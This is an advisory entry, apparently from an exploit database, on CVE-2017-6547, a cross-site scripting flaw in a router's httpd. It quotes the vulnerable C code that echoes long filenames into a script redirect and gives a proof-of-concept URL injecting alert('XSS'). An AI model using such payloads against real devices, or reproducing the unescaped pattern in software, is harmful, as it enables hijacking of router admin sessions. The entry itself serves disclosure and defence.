Cross-Site Scripting (XSS)

vendor:

httpd

by:

N/A

6,1

CVSS

MEDIUM

XSS

CWE

Product Name: httpd

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: Yes

Related CWE: CVE-2017-6547

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2017

httpd checks in the function handle_request if the requested file name is longer than 50 chars. It then responds with a redirection which allows an attacker to inject arbitrary JavaScript code into the router’s web interface context.

Mitigation:

Ensure that the length of the requested file name is properly validated and that the response does not contain any user-supplied data.

Source

Exploit-DB raw data:

Cross-Site Scripting (XSS)

Component: httpd

CVE: CVE-2017-6547

Vulnerability:

httpd checks in the function handle_request if the requested file name is longer than 50 chars. It then responds with a redirection which allows an attacker to inject arbitrary JavaScript code into the router’s web interface context.

...

if(strlen(file) > 50 &&!(strstr(file, "findasus")) && !(strstr(file, "acme-challenge")))
{
    char inviteCode[256];
    snprintf(inviteCode, sizeof(inviteCode), "<script>location.href='/cloud_sync.asp?flag=%s';</script>", file);
    send_page( 200, "OK", (char*) 0, inviteCode, 0);

...
PoC:

http://192.168.1.1/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA';alert('XSS');'A